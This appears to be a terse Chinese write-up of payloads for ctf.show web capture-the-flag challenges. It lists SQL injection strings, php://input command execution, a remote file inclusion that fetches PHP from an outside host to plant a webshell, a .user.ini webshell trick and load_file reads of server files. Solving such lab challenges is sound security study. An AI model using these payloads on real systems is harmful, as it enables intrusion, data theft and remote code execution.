仅payload或简单思路,持续更新
web2admin' or 1=1#
admin' or 1=1 union select 1,group_concat(flag),3 from web2.flag#
web3http://bd154800-80c7-4e24-9175-4eb98b4d3584.chall.ctf.show/?url=php://input
POST: <?php system("ls");?>
POST: <?php system("cat ctf_go_go_go");?>
web4
远程文件包含:486f9d64-fe46-4c00-8da3-8a31d154530b.chall.ctf.show/?url=http://hausahan.cn/temp.txt
#temp.txt内容:<?php
$myfile=fopen('temp.php','w');
$txt = 'mumaneirong';
fwrite($myfile,$txt);
fclose($myfile)
?>486f9d64-fe46-4c00-8da3-8a31d154530b.chall.ctf.show/temp.php?hausa=cat ./../flag.txt
web5
md5碰撞62499f30-4ef5-4609-80f0-0e8211a8a225.chall.ctf.show/?v1=QNKCDZO&v2=240610708
web6admin'/**/union/**/select/**/1,concat(flag),3/**/from/**/flag#
web70fcebb43-b8f7-44cb-a460-95f836ed7773.chall.ctf.show/index.php?id=1'/**/union/**/select/**/1,concat(flag),3/
**/from/**/flag#
web8
过滤了单引号和逗号
解题脚本:https://github.com/hausa-han/CTFscripts/blob/main/ctfshow-web8.py
web9
POST:password=ffifdyop
web10
username:admin'/**/or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#
web11
删除cookie后空密码登录
web12
禁用了system();?cmd=print_r(glob("*"));
?cmd=highlight_file("xxxx.php");
web13
传txt马,后传.user.ini,并指定auto_prepend_file为自己的马
web14/here_1s_your_f1ag.php?query=-1//union//select/**/load_file('/var/www/html/secret.php')
?query=-1//union//select/**/load_file('/real_flag_is_here')
CTFshow web1
www.zip
user_main.php中提供不同的排序显示方法,可逐步猜出flag,可有以下脚本:
https://github.com/hausa-han/CTFscripts/blob/main/CTFshow_web1.py
红包题第二弹/?cmd=?>/???/?p /???????? p.ppp;?>
/p.ppp